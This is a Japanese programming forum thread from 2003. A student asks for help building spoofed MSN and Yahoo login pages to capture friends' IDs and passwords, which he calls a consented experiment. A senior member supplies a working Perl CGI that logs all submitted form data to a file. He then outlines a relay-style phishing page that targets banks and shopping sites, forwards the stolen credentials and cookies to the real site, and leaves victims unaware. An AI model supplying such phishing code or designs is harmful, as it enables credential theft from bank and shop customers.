- PR -

IEのURL偽装について

1
投稿者投稿内容
hose
会議室デビュー日: 2003/12/12
投稿数: 14
投稿日時: 2003-12-19 18:41
学生やっているHOSEと申します。
今IEのURL偽装問題の検証をしています。ちなみにMSNやYAHOOのHPを偽装して自分のURL
からリンクさせておき大学内の友人たちが不信感もたずにIDとパスワードを盗んでしまう。という実験でもちろんあらかじめ協力してもらい新しくIDとパスワードをシュミレーション用に登録してもらっています。
http://www.geocities.co.jp/SiliconValley/3516/yaroyaro.htm#2

を参考にしてまず簡単なものを作ってみたのですが、
送信後に開くページには
#!c:\perl/bin print $ENV{'QUERY_STRING'} EOF exit;

というエラーがでてDatの中に保存できていませんでした。
書いているとうりにやってるつもりなのですがだめなのでしょうか。
アドバイスがあれば教えてください。

今は単純にperlでログインBOXをつくりサインインのボタンを押すとほかのDatファイルにデータを保存させるという簡単なものを考えています。
一応保存のみの目的で使うのでチェック機能はまったくいりません。

僕自身CGIについてまったく知識がないのですが、この方法でできるのでしょうか。
またよければ参考プログラムなどのアドバイスなどいただけたらうれしいと思っています。

個人的な都合のよいスレを作って申し訳ありませんが、よろしくお願いします。
がるがる
ぬし
会議室デビュー日: 2002/04/12
投稿数: 873
投稿日時: 2003-12-19 18:55
ども。がると申します。
実験としては面白いと思いますので頑張ってください。

さて。
引用:

hoseさんの書き込み (2003-12-19 18:41) より:
http://www.geocities.co.jp/SiliconValley/3516/yaroyaro.htm#2
を参考にしてまず簡単なものを作ってみたのですが、

との事でWebサイトを拝見したのですが。
純粋にカット&ペーストすると、エラーになります(苦笑

とりあえず「logfile.datという名前のファイルにデータを吐き出す」
だけの、ものごっつ手抜きな、上記のプログラムの改良品を。
ただ、普通に考えるとほとんど使い物になりませんのでご注意を。
飽く迄「雰囲気のさわりを味わう」程度のものです。
あと、一行目は適宜書き換えてくださいませ。

では〜。

コード:
#!/usr/bin/perl
#####GETとPOSTの自動判別
if ($ENV{'REQUEST_METHOD'} eq 'POST') {
  read(STDIN,$str,$ENV{'CONTENT_LENGTH'});
}else{
  $str = $ENV{'QUERY_STRING'};
};
@hairetu = split('&', $str);
print "Content-type: text/plain\n\n";
#####ファイルを開いてデータを格納
open(FILEIN, ">>logfile.dat");
foreach $i (@hairetu) {
  ($name, $value) = split('=', $i);
  print FILEIN $name . "=" . $value . ",";
  print $name . " = " . $value . "\n";
}
print FILEIN "\n";

close(FILEIN);

exit;


hose
会議室デビュー日: 2003/12/12
投稿数: 14
投稿日時: 2003-12-19 19:18
早速のアドバイスありがとうございます。

早速実行してみたところ、できました。本当にありがとうございました。


     引用――――――――――――――――――――――――――――――――

        ただ、普通に考えるとほとんど使い物になりませんのでご注意を。
        飽く迄「雰囲気のさわりを味わう」程度のものです。

     ――――――――――――――――――――――――――――――――――

雰囲気のさわりを味わうだけですが、それでもかなり喜んでしまいました。
ありがとうございます。

実際に使えるようなものといいますとどのようなものなのでしょうか。
本当に低レベルな質問で申し訳ありません。

また実際にCGIを組んで行く際に参考例や参考にしたらいいサイトやアドバイスなど
をいただけたらうれしいです。

よろしくお願いします。
がるがる
ぬし
会議室デビュー日: 2002/04/12
投稿数: 873
投稿日時: 2003-12-24 12:17
ども。がるです。
引用:

実際に使えるようなものといいますとどのようなものなのでしょうか。
本当に低レベルな質問で申し訳ありません。

んと、これは私の個人的主観的見方なので斜めに読んでください。
今回のコードは大まかには
・データを取得
・データをファイルに書き込む
という程度の挙動です。
多分、まじめに「使える」ものを組む場合、
*前提として適当な大手サイト。銀行サイトとか買い物系サイトとかが狙い目
:大手サイトそっくりのlogin Pageを作成
・データを取得
・ファイルに書き込む
・本物のサイトにlogin(ID&Password)情報を送る
・帰ってきた情報(URLとかCookieとか)を取得
・本物のサイトにユーザ画面を遷移させる
とかいう感じでしょうか?
これで
・ユーザがまったく気づかずに
・パスワードなどが抜ける
状態になります。
ちっと気合を入れると「ユーザ新規登録」とかでもできそうですねぇ。

引用:

また実際にCGIを組んで行く際に参考例や参考にしたらいいサイトやアドバイスなど
をいただけたらうれしいです。

サイトには、残念ながら心当たりはないのですが :-P
プログラムは「作って何ぼ」だと思います。
まず作って、動かして。そこから「次は何をしたいか」を考えると
上達も早いのではないかなぁ、と。
きちんとした先達のいるところでなら「仕事をする」というのもまた
上達の手段ではあります。

頑張ってください ^^
1

スキルアップ/キャリアアップ(JOB@IT)